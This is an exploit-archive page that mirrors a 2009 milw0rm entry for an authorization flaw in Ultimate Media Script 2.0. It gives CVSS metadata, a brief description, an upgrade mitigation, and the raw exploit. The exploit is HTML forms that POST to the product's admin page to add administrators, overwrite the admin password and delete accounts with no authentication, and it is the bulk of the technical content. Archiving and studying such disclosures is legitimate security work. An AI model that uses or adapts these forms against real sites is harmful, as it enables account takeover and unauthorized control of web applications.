header-logo
Suggest Exploit
vendor:
Ultimate Media Script
by:
milw0rm.com
8,8
CVSS
HIGH
Remote Change Password/Add Admin/Delete Admin
264
CWE
Product Name: Ultimate Media Script
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: Yes
Related CWE: N/A
CPE: a:umscript:ultimate_media_script:2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Ultimate Media Script 2.0 Remote Change Password/Add Admin/Delete Admin Exploit

A vulnerability in Ultimate Media Script 2.0 allows remote attackers to change passwords, add admins, and delete admins. This is done by sending a POST request to the 'mod=admins' page with the appropriate parameters. The 'username' and 'pass' parameters are used to add an admin, while the 'username_edit[1]' and 'pass_edit[1]' parameters are used to modify an existing admin.

Mitigation:

Upgrade to the latest version of Ultimate Media Script 2.0
Source

Exploit-DB raw data:

<tittle> Ultimate Media Script 2.0 Remote Change Password/Add Admin/Delete Admin Exploit</tittle>
 <FORM action="http://umscript.com/demo/admin/index.php?mod=admins" method=post>
       <TD class=column1><INPUT class=ums_input name=username></TD>
       <TD class=column1><INPUT class=ums_input name=pass></TD>
       <TD class=column1 align=middle><INPUT type=image border=0 src="img/save.gif"></TD>
       <INPUT type=hidden value=add name=button>
      </FORM>
    </TR>
 
        <TR>
          <TD class=cat><b>Admin name:</b></TD>
          <TD class=cat><b>Password:</b></TD>
          <TD class=cat><b>Delete:</b></TD></TR>
 
        <FORM action="http://umscript.com/demo/admin/index.php?mod=admins" method=post>
 
        <TR>
          <TD class=column2 width="33%"><INPUT class=ums_input value="admin" name=username_edit[1]></TD>
          <TD class=column2 width="33%"><INPUT class=ums_input type=password value="admin" name=pass_edit[1]></TD>
          <TD class=column2><A href="http://umscript.com/demo/admin/index.php?mod=admins&delete=1" onclick="return (quest())"><IMG border=0 alt=Delete src="img/delete.gif"></A></TD>
        </TR>
 
        <INPUT type=hidden value=modify name=do>
        <TR>
           </SPAN>
           <INPUT type=image border=0 src="img/save_all.gif">

# milw0rm.com [2009-05-26]

Navigation

Suggest Exploit

Services By CQR